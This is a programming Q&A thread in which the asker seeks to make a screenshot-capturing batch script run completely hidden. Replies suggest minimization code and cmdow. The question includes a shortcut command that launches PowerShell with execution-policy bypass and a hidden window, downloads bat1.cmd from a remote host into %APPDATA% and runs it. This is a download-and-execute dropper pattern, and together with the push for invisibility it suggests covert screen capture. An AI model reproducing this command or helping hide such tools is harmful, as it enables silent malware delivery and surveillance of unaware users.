# (Batch Script) - Desktop screenshot (functional) but cannot be minimized?

Tags: batch-file, minimized

Thank you in advance for your time.

I found/edit a batch script (bat1.cmd) which take a desktop screenshot. Everything is working good actually. Here is my complete code = https://pastebin.com/KvqgFx5L .

My only request here is to **hide/minimize the bat1.cmd window** when i run it (within a lnk, check "NB" at the end of my message).

I made some researches and a classic solution is to use this kind of scripts :

```
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
```

or

```
if not "%minimized%"=="" goto :minimized
set minimized=true
start /min cmd /C "%~dpnx0"
goto :EOF
:minimized
```

Unfortunately my batch script (bat1.cmd) have special parameters that do not allow (?) to add this kind of "minimize" script (I tried to add it on top, inside the script etc and nothing is working).

NB : The batch script (bat1.cmd) is donwloaded/run within a shortcurt (bat1.lnk) but adding minimized parameters in the lnk won't minimized the bat1.cmd window (I guess ?/I made test).

```
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden ; (New-Object System.Net.WebClient).DownloadFile('http://host.com/bat1.cmd','%APPDATA%\bat1.cmd');Start('%APPDATA%\bat1.cmd');
```

Thank you a lot in advance for your help.

Comment: I'd not try to reinvent the wheel - I suggest using [cmdow](https://ritchielawrence.github.io/cmdow/) for this.

Answer (score 0):

Ok I have found a solution. Add the "minimize" code at the top, after :batch @echo off. I guess it is alright ? The window still appears 0.1 sec and is minimized then. **Any way to make it totally hidden** ? I already reduced the window size column/line. I wonder if we can change the window position (without 3rd party tool) ?

```
// 2>nul||@goto :batch
/*
:batch
@echo off

if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
```

Comment: I would change that last line to read `If Not Defined IS_MINIMIZED (Set "IS_MINIMIZED=1" <rest>)` where `<rest>` is your commands replacing any unnecessary `&&` with `&`.